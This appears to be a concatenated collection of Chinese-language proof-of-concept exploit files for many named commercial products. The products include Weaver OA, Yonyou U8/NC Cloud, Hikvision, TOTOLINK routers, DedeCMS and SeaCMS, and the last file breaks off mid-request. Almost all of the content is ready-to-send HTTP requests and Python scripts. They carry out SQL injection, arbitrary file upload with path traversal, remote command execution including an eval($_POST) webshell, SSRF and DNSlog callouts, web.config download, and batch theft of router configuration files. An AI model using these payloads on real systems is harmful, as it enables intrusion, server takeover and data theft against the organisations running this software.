8 | Content-Length: 372
9 | Content-Type: multipart/form-data; boundary=f6dae662e22371daece5ff851b1c4a39
10 |
11 | --f6dae662e22371daece5ff851b1c4a39
12 | Content-Disposition: form-data; name="newLanguageName"
13 |
14 | test
15 | --f6dae662e22371daece5ff851b1c4a39
16 | Content-Disposition: form-data; name="languageFile"; filename="exploit.js"
17 | Content-Type: text/javascript
18 |
19 | new java.lang.ProcessBuilder["(java.lang.String[])"](["ping 5hnlyo.dnslog.cn"]).start()
20 | --f6dae662e22371daece5ff851b1c4a39--
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/泛微OA E-Cology存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /services/WorkflowServiceXml HTTP/1.1
3 | Host: 127.0.0.1
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
5 | Content-Type: text/xml
6 | Accept-Encoding: gzip
7 | Content-Length: 487
8 |
9 |
10 |
11 |
12 | 1
13 | 1
14 | 1
15 | 1
16 |
17 | 1=1
18 |
19 |
20 |
21 |
22 | ```
23 |
24 |
--------------------------------------------------------------------------------
/泛微E-office-10接口leave_record.php SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | http://{host}/eoffice10/server/ext/system_support/leave_record.php?
4 | flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10
5 | ```
6 |
7 |
8 |
9 |
10 |
11 | ```
12 | GET /eoffice10/server/ext/system_support/leave_record.php?flow_id=1%27+AND+%28SELECT+4196+FROM+%28SELECT%28SLEEP%285%29%29%29LWzs%29+AND+%27zfNf%27%3D%27zfNf&run_id=1&table_field=1&table_field_name=user()&max_rows=10 HTTP/1.1
13 | Host:
14 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
15 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
16 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
17 | Accept-Encoding: gzip, deflate
18 | Connection: close
19 | Upgrade-Insecure-Requests: 1
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/海康威视综合安防管理平台前台RCE.md:
--------------------------------------------------------------------------------
1 | # 描述
2 |
3 | 海康威视综合安防管理平台 /center/api/installation/detection 接口处存在远程命令执行漏洞,攻击者利用该漏洞可直接获取服务器权限。
4 |
5 |
6 |
7 | ### poc
8 |
9 |
10 |
11 | ```
12 | POST /center/api/installation/detection HTTP/1.1
13 | Host:
14 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
15 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
16 | Accept-Encoding: gzip, deflate
17 | Accept-Language: zh-CN,zh;q=0.9
18 | Connection: close
19 | Content-Type: application/json;charset=UTF-8
20 |
21 | {"type":"environment","operate":"","machines":{"id": "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/echo.txt)"}}
22 | ```
23 |
24 | 访问/vms/static/echo.txt
25 |
26 | 检查是否成功
--------------------------------------------------------------------------------
/T18-1TOTOLINK-A6000R-RCE.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /cgi-bin/luci/admin/mtk/webcmd?cmd=ls%20/>/www/555.txt HTTP/1.1
3 | Host: 192.168.187.136
4 | Connection: close
5 | Cache-Control: max-age=0
6 | sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
7 | sec-ch-ua-mobile: ?0
8 | sec-ch-ua-platform: "Windows"
9 | Upgrade-Insecure-Requests: 1
10 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
11 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
12 | Sec-Fetch-Site: none
13 | Sec-Fetch-Mode: navigate
14 | Sec-Fetch-User: ?1
15 | Sec-Fetch-Dest: document
16 | Accept-Encoding: gzip, deflate
17 | Accept-Language: zh-CN,zh;q=0.9
18 | Cookie: sysauth=80c79bd6ad9bfba9656b7a8bee2a988f
19 | ```
20 |
21 |
--------------------------------------------------------------------------------
/网康 NS-ASG sql 注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /admin/list_addr_fwresource_ip.php HTTP/1.1
3 | Host: ip:port
4 | Cookie: PHPSESSID=f30e8a16a1b6373bbc11e1ce84445033
5 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/110.0
6 | Accept:
7 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 | Accept-Encoding: gzip, deflate
10 | Content-Type: application/x-www-form-urlencoded
11 | Content-Length: 29
12 | Origin: https://ip:port
13 | Referer: https://ip:port/admin/list_addr_fwresource_ip.php
14 | Upgrade-Insecure-Requests: 1
15 | Sec-Fetch-Dest: document
16 | Sec-Fetch-Mode: navigate
17 | Sec-Fetch-Site: same-origin
18 | Sec-Fetch-User: ?1
19 | Te: trailers
20 | Connection: close
21 | ResId%5B%5D=13*&action=delete
22 | ```
23 |
24 |
--------------------------------------------------------------------------------
/AJ-Report开源数据大屏存在远程命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 | Accept-Encoding: gzip, deflate, br
7 | Accept-Language: zh-CN,zh;q=0.9
8 | Content-Type: application/json;charset=UTF-8
9 | Connection: close
10 |
11 | {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/云时空商业ERP文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 | import requests
3 |
4 | def verify(ip):
5 |
6 | url = f'{ip}/uploads/pics/2023-12-6/test.jsp'
7 |
8 | headers = {
9 | 'Content-Type': 'multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388',
10 | }
11 |
12 | payload = '''
13 | --4eea98d02AEa93f60ea08dE3C18A1388
14 | Content-Disposition: form-data; name="file1"; filename="test.jsp"
15 | Content-Type: application/octet-stream
16 |
17 | <% out.println("This website has a vulnerability"); %>
18 | --4eea98d02AEa93f60ea08dE3C18A1388--
19 | '''
20 |
21 | try:
22 | response = requests.post(url, headers=headers, data=payload)
23 | # 验证成功输出相关信息
24 | if response.status_code == 200 :
25 | print(f"{ip}存在云时空商业ERP文件上传!!!")
26 | else:
27 | print('漏洞不存在。')
28 |
29 | except Exception as e:
30 | pass
31 |
32 | if __name__ == '__main__':
33 | self = input('请输入目标主机IP地址:')
34 | verify(self)
35 | ```
36 |
37 |
--------------------------------------------------------------------------------
/金和OA_jc6_ntko-upload任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
3 | Host: you_ip
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
5 | Content-Length: 392
6 | Accept: */*
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 | Content-Type: multipart/form-data; boundary=----zqulxi4ku42pfmoelvc0
10 | Connection: close
11 |
12 | ------zqulxi4ku42pfmoelvc0
13 | Content-Disposition: form-data; name="filename"
14 |
15 | ../../../../upload/xicxc2sv1n.jsp
16 | ------zqulxi4ku42pfmoelvc0
17 | Content-Disposition: form-data; name="upLoadFile"; filename="xicxc2sv1n.jpg"
18 | Content-Type: image/jpeg
19 |
20 | <% out.println(111*111); %>
21 | ------zqulxi4ku42pfmoelvc0
22 | Content-Disposition: form-data; name="Submit"
23 |
24 | upload
25 | ------zqulxi4ku42pfmoelvc0--
26 | ```
27 |
28 |
--------------------------------------------------------------------------------
/用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 | Cookie: ASP.NET_SessionId=sfzg0pgxvld3ltgimecqkjg4; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721822405; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721822415; HMACCOUNT=AFE08148BD092161
10 | Upgrade-Insecure-Requests: 1
11 | Priority: u=0, i
12 | Content-Type: application/x-www-form-urlencoded
13 | Content-Length: 36
14 |
15 | {
16 | "address":"ftlhbc.dnslog.cn"
17 | }
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/用友 NC Cloud jsinvoke 任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```python
2 | import requests
3 |
4 | def verify(ip):
5 |
6 | url = f'{ip}/uapjs/jsinvoke/?action=invoke'
7 | headers = {
8 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
9 | }
10 | payload = '''
11 | {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
12 | "parameterTypes":["java.lang.Object","java.lang.String"],
13 | "parameters":["123456","webapps/nc_web/2YIOmzdcUDhwMYTLk65p3cgxvxy.jsp"]}
14 | '''
15 | try:
16 | response = requests.post(url, headers=headers, data=payload)
17 | if response.status_code == 200 :
18 | print(f"{ip}存在用友 NC Cloud jsinvoke 任意文件上传漏洞!!!")
19 | else:
20 | print('漏洞不存在。')
21 | except Exception as e:
22 | pass
23 |
24 | if __name__ == '__main__':
25 | self = input('请输入目标主机IP地址:')
26 | verify(self)
27 | ```
28 |
29 |
--------------------------------------------------------------------------------
/用友U8 CRM import.php 文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1
4 | Host:
5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 | Accept-Encoding: gzip, deflate
8 | Accept-Language: zh-CN,zh;q=0.9
9 | Connection: close
10 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye0z8QbHs79gL8vW5
11 |
12 |
13 | ------WebKitFormBoundarye0z8QbHs79gL8vW5
14 | Content-Disposition: form-data; name="xfile"; filename="1.xls"
15 |
16 |
17 | ------WebKitFormBoundarye0z8QbHs79gL8vW5
18 | Content-Disposition: form-data; name="combo"
19 |
20 | rce.php
21 | ------WebKitFormBoundarye0z8QbHs79gL8vW5--
22 | ```
23 |
24 |
--------------------------------------------------------------------------------
/H3C密码泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | import requests
3 | import urllib3
4 | from urllib.parse import urlparse
5 |
6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
7 | payload = '/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg'
8 | invalidkey = "home.asp"
9 | with open('target.txt', 'r') as f:
10 | for target in f:
11 | url = target + payload
12 | # print('target:',url)
13 | try:
14 | req = requests.get(url, verify=False)
15 | except:
16 | pass
17 | if req.status_code == 200:
18 | if invalidkey not in req.text:
19 | parsed = urlparse(url)
20 | with open(str(parsed.hostname) + '.' + str(parsed.port) + '.txt', 'w') as w:
21 | w.write(req.text)
22 | w.close()
23 | print('[+] Target: ' + target + ' is Vulnerability'
24 | ```
25 |
26 |
--------------------------------------------------------------------------------
/海康卫视综合安防 uploadAllPackage任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /center_install/picUploadService/v1/uploadAllPackage/image HTTP/1.1
3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
4 | Accept: */*
5 | Host: 192.168.52.228:8001
6 | Accept-Encoding: gzip, deflate
7 | Connection: close
8 | Token: SElLIGlhL3NmaGNjaTY3WWxWK0Y6UzVCcjg1a2N1dENqVUNIOUM3SE1GamNkN2dnTE1BN1dGTDJldFE0UXFvbz0=
9 | Content-Type: multipart/form-data; boundary=--------------------------553898708333958420021355
10 | Content-Length: 233
11 |
12 | ----------------------------553898708333958420021355
13 | Content-Disposition: form-data; name="sendfile"; filename="../../../../components/tomcat85linux64.1/webapps/eportal/y4.js"
14 | Content-Type: application/octet-stream
15 |
16 | expzhizhuo
17 | ----------------------------553898708333958420021355--
18 | ```
19 |
20 | ```
21 | http://ip/portal/ui/login/..;/..;y4.js
22 | ```
23 |
24 |
--------------------------------------------------------------------------------
/万户ezoffice wpsservlet任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```python
2 | import requests
3 |
4 | def verify(ip):
5 |
6 | url = f'{ip}/defaultroot/platform/portal/layout/check.jsp'
7 |
8 | headers = {
9 | 'Content-Type': 'multipart/form-data',
10 | }
11 |
12 | payload = '''
13 | --55aeb894de1521afe560c924fad7c6fb
14 | Content-Disposition: form-data; name="NewFile"; filename="check.jsp"
15 |
16 | <% out.print("This website has a vulnerability!!!");%>
17 | --55aeb894de1521afe560c924fad7c6fb--
18 | '''
19 |
20 | try:
21 | response = requests.post(url, headers=headers, data=payload)
22 | # 验证成功输出相关信息
23 | if response.status_code == 200 :
24 | print(f"{ip}存在万户ezoffice wpsservlet任意文件上传!!!")
25 | else:
26 | print('漏洞不存在。')
27 |
28 | except Exception as e:
29 | pass
30 |
31 | if __name__ == '__main__':
32 | self = input('请输入目标主机IP地址:')
33 | verify(self)
34 | ```
35 |
36 |
--------------------------------------------------------------------------------
/用友u8-cloud RegisterServlet SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | import requests
3 |
4 | def verify(ip):
5 | url = f'{ip}/servlet/RegisterServlet'
6 | headers = {
7 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36',
8 | 'Connection': 'close',
9 | 'Content-Length': '85',
10 | 'Accept': '*/*',
11 | 'Accept-Language': 'en',
12 | 'Content-Type': 'application/x-www-form-urlencoded',
13 | 'Accept-Encoding': 'gzip',
14 | }
15 | payload = '''usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--'''
16 | try:
17 | response = requests.post(url, headers=headers, data=payload,verify=False)
18 | # 验证成功输出相关信息
19 | if response.status_code == 200 :
20 | print(f"{ip}存在用友u8-cloud RegisterServlet SQL注入漏洞!!!")
21 |
22 | except Exception as e:
23 | pass
24 |
25 |
26 | if __name__ == '__main__':
27 | self = input('请输入目标主机IP地址:')
28 | verify(self)
29 | ```
30 |
31 |
--------------------------------------------------------------------------------
/锐捷统一上网行为管理与审计系统 static_convert.php 命令执行.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'abab'%20>>%20/var/www/html/test.txt%0A HTTP/1.1
4 | Host:your-ip
5 | Accept: application/json, text/javascript, */*
6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
7 | Accept-Encoding: gzip, deflate
8 | Accept-Language: zh-CN,zh;q=0.9
9 | Connection: close
10 | ```
11 |
12 | POC2
13 |
14 | ```
15 | GET /view/IPV6/naborTable/static_convert.php?blocks[0]=|echo%20%27%27%20>/var/www/html/rce.php HTTP/1.1
16 | Host:
17 | Accept: application/json, text/javascript, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
18 | Accept-Encoding: gzip, deflate
19 | Accept-Language: zh-CN,zh;q=0.9
20 | Connection: close
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/用友-CRM客户关系管理系统-任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
5 | Content-Length: 277
6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 | Accept-Encoding: gzip, deflate
8 | Accept-Language: zh-CN,zh;q=0.9
9 | Connection: close
10 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye0z8QbHs79gL8vW5
11 | Upgrade-Insecure-Requests: 1
12 |
13 | ------WebKitFormBoundarye0z8QbHs79gL8vW5
14 | Content-Disposition: form-data; name="xfile"; filename="11.xls"
15 |
16 |
17 | ------WebKitFormBoundarye0z8QbHs79gL8vW5
18 | Content-Disposition: form-data; name="combo"
19 |
20 | help.php
21 | ------WebKitFormBoundarye0z8QbHs79gL8vW5--
22 | ```
23 |
24 |
--------------------------------------------------------------------------------
/用友U8 Cloud linkntb存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /yer/html/nodes/linkntb/linkntb.jsp?pageId=linkntb&billId=1%27%29+AND+5846%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%285846%3D5846%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29--+Astq&djdl=1&rand=1 HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 | Accept-Encoding: gzip, deflate, br
8 | Connection: close
9 | Cookie: JSESSIONID=FC1C64E67AE8D02989467988D2FF143A.server; JSESSIONID=5BA15086E03362F38918286E9E0C0E24.server
10 | Upgrade-Insecure-Requests: 1
11 | Priority: u=1
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /Service/DownloadTemplate.asmx HTTP/1.1
3 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
4 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 | Accept-Encoding: gzip, deflate, br
7 | Connection: close
8 | Cookie: ASP.NET_SessionId=f40br0ilcoosnxgllqrmltkd
9 | Upgrade-Insecure-Requests: 1
10 | Priority: u=1
11 | SOAPAction: http://tempuri.org/DownloadFile
12 | Content-Type: text/xml;charset=UTF-8
13 | Host:
14 | Content-Length: 310
15 |
16 |
17 |
18 |
19 |
20 |
21 | ../web.config
22 |
23 |
24 |
25 | ```
26 |
27 |
--------------------------------------------------------------------------------
/IP网络广播服务平台存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | Fofa:icon_hash="-568806419"
2 |
3 | ```
4 | POST /api/v2/remote-upgrade/upload HTTP/1.1
5 | Host: 127.0.0.1
6 | Content-Length: 197
7 | Cache-Control: max-age=0
8 | Upgrade-Insecure-Requests: 1
9 | Origin: http://127.0.0.1
10 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytiZYyyKkbwCxtHC1
11 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
12 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
13 | Referer: http://127.0.0.1/api/v2/remote-upgrade/upload
14 | Accept-Encoding: gzip, deflate
15 | Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
16 | Connection: close
17 |
18 | ------WebKitFormBoundarytiZYyyKkbwCxtHC1
19 | Content-Disposition: form-data; name="file"; filename="1.php"
20 | Content-Type: image/jpeg
21 |
22 |
23 | ------WebKitFormBoundarytiZYyyKkbwCxtHC1--
24 | ```
25 |
26 |
--------------------------------------------------------------------------------
/亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /CDGServer3/NoticeAjax;Service HTTP/1.1
3 | Host:
4 | Cache-Control: max-age=0
5 | Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
6 | Sec-Ch-Ua-Mobile: ?0
7 | Sec-Ch-Ua-Platform: "Windows"
8 | Upgrade-Insecure-Requests: 1
9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
11 | Sec-Fetch-Site: cross-site
12 | Sec-Fetch-Mode: navigate
13 | Sec-Fetch-User: ?1
14 | Sec-Fetch-Dest: document
15 | Referer:
16 | Accept-Encoding: gzip, deflate
17 | Accept-Language: zh-CN,zh;q=0.9
18 | Priority: u=0, i
19 | Connection: close
20 | Content-Type: application/x-www-form-urlencoded
21 | Content-Length: 98
22 |
23 |
24 | command=delNotice¬iceId=123';if(select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0: 3'--
25 | ```
26 |
27 |
--------------------------------------------------------------------------------
/海洋CMS后台admin_smtp.php存在远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /at1fcg/admin_smtp.php?action=set HTTP/1.1
3 | Host: 127.0.0.12
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 | Accept-Encoding: gzip, deflate, br
8 | Content-Type: application/x-www-form-urlencoded
9 | Content-Length: 192
10 | Origin: http://127.0.0.12
11 | Connection: close
12 | Referer: http://127.0.0.12/at1fcg/admin_smtp.php
13 | Cookie: PHPSESSID=rcejd2jps1jcrv8gdoumqmf71k
14 | Upgrade-Insecure-Requests: 1
15 | Sec-Fetch-Dest: iframe
16 | Sec-Fetch-Mode: navigate
17 | Sec-Fetch-Site: same-origin
18 | Sec-Fetch-User: ?1
19 | Priority: u=4
20 |
21 | smtpserver=${eval($_POST[1])}&smtpserverport=&smtpusermail=12345%40qq.com&smtpname=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86%E7%BD%91&smtpuser=12345%40qq.com&smtppass=123456789&smtpreg=off&smtppsw=
22 | ```
23 |
24 |
--------------------------------------------------------------------------------
/DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20`whoami`}} HTTP/1.1
3 | Host: 127.0.0.11
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 | Accept-Encoding: gzip, deflate, br
8 | Connection: close
9 | Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1%2C5_1%2C6_1; PHPSESSID=89s6bbv2d1unokav5grt4bk2g4; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=10acd9938ef3615d; DedeLoginTime=1720327720; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=c5e6c12f26661f56; _csrf_name_236f0c58=6d608f0ee0d0e0b59410565dfeec6b2b; _csrf_name_236f0c581BH21ANI1AGD297L1FF21LN02BGE1DNG=bc5881b7b91f1bd9
10 | Upgrade-Insecure-Requests: 1
11 | Sec-Fetch-Dest: document
12 | Sec-Fetch-Mode: navigate
13 | Sec-Fetch-Site: none
14 | Sec-Fetch-User: ?1
15 | Priority: u=1
16 | ```
17 |
18 |
--------------------------------------------------------------------------------
/泛微HrmService存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /services/HrmService HTTP/1.1
3 | Upgrade-Insecure-Requests: 1
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 | Accept-Encoding: gzip, deflate, br
7 | Connection: close
8 | SOAPAction: urn:weaver.hrm.webservice.HrmService.getHrmDepartmentInfo
9 | Content-Type: text/xml;charset=UTF-8
10 | Host:
11 | Content-Length: 427
12 | X-Forwarded-For: 127.0.0.1
13 |
14 |
15 |
16 |
17 |
18 |
19 | gero et
20 |
21 | 1)AND(db_name()like'ec%'
22 |
23 |
24 |
25 | ```
26 |
27 |
--------------------------------------------------------------------------------
/因酷教育平台RCE(CVE-2024-35570).md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /image/gok4?¶m=image&fileType=jpg,gif,png,jpeg,jspx&pressText=undefined HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 | Accept-Encoding: gzip, deflate
8 | Content-Type: multipart/form-data; boundary=---------------------------308436435515370414691526924874
9 | Content-Length: 2853
10 | Origin: http://192.168.3.102:8080
11 | Connection: close
12 | Referer: http://192.168.3.102:8080/admin/website/doUpdateImages/309
13 | Upgrade-Insecure-Requests: 1
14 | Priority: u=4
15 |
16 | -----------------------------308436435515370414691526924874
17 | Content-Disposition: form-data; name="uploadfile"; filename="../../../../2.jspx"
18 | Content-Type: image/jpeg
19 |
20 | 123
21 | -----------------------------308436435515370414691526924874--
22 | ```
23 |
24 |
--------------------------------------------------------------------------------
/蓝凌EKP存在sys_ui_component远程命令执行漏洞 .md:
--------------------------------------------------------------------------------
1 | ```
2 | POST/sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
3 | Host:xx.xx.xx.xx
4 | Accept:application/json, text/javascript, */*; q=0.01
5 | Accept-Encoding:gzip, deflate
6 | Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
7 | Connection:close
8 | Content-Length:401
9 | Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
10 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X xxx)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15X-Requested-With: XMLHttpRequest
11 |
12 | ------WebKitFormBoundaryL7ILSpOdIhIIvL51
13 |
14 | Content-Disposition:form-data; name="method"
15 |
16 | replaceExtend
